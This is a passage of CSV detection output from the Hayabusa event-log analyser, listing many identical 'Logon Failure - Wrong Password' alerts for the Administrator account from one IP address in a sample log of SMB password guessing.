192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.440 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KrpBO1SCHpt27CRM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ifPePsozBYRLCU3k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vve4r8QwaMLKrrcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.569 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9ArElR5k8yLefWu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a1Y126C516BaGcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL7PnrO2dLsEbebQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.686 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GGTlLZ8J9f2PtiuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sVwPFs7bhJgJwRt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.772 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dgQNHL9etdHdRw9Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjZrWpJlN2CwbxFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.858 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72lmrp6neWGKAURB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.896 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CnTi5dgoWunYutJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.936 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi2fTl07llsJEYyt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:16.980 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hohh8KS1eYtojEya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.020 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsuC8F95UmsOSKvs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.064 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: be8UJ0EN7XS5r0b6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CgJlVYanwWKAhJ7O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.156 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zthqCIkr1nKtqcCj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.200 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tzmi8I402j71q5Wg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.244 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m0U3NYl8QEbgeJry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.277 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJJ1FOUIBInGkKPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bu0X5RisszAHEs0X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.370 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZZfs8zqT2bLOAHq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.409 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkpO31LzJfaYLyjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.461 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJrIsRTWUwPuySR7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.503 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHNccqtwl9Y9IhLq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.536 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: APlvDcMzvms0gehT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.585 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxOERGKI75RarVNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uvzwd5qqC7og49yW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.662 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lksm3o2g0YhFnm4Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zwXhSPCV4qHVF9Rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z31baZ4G36idFMeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.784 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK63qylKunHZB3zS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALJxKGwyZz7JDpRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.862 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8tioTO3TEIzdzY0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.905 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5dIKTgQkvPKzKJoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.947 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ta0IMrlArbgONhDG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:17.985 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MKNUu4624Rvr87kK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.032 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7jIL2FkXzWqvWTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.076 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJMVh1zdQt7EikVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.113 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OqvximSAPlXZ3An | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.160 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tr2GQ1F3jccpWrsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCmbvQXXXzhHOdMG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qTp1BwPv8XiK2mrG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rnb19AXxM5ArcLxX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.359 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUS5CKq2W1rkq46d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FzKSUVdsC5eENWDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.434 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QFL07Mhy4iw5psBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.486 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMpitnzLXDLSXL73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.584 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSfaPdcsiRQoGYYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.616 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJRP4bS9Qgg06Z5P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.679 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3Z4veMNKngHUDoRf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmF0YFgAMSRotb1y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DmrbO3dZw46DgmZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.805 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qg4CMwLpfzLrvDPj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.850 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKDKUXNNhuSqRiTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cBocrjNXjmuPCKRJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.924 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: loCrAXibgVxcOtCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:18.966 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZ7pHOJeOExrON2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.006 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MeucKpaodpmdsqhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LRlmBeBlV6n4MQyo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8FYOF6HxJHqm7GW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.122 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9tBtz1GYn5J8sbFH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.160 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qn8PlxEzIu9AKUgt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdjqlNDU3U150UAw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esaTfuwuiFAkIVs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.280 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y4LbVQ5ytgVCqFmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rWoX76sgYTVwxkD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.386 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQFJRRYn6sjYK5cD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wyVuBGEFGJqImQ7W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pRvnyVGxG8i0e3PQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.520 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X6Hv2fj43a8j1O2P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: myP4zVFyw2qE1SV7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.612 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lpmBcVilH72dYF7E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.643 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jd9hKGDxLcnZphlL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.684 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OmXgOD9kaGJ4PIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BpQtWW0fAEzNH28B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 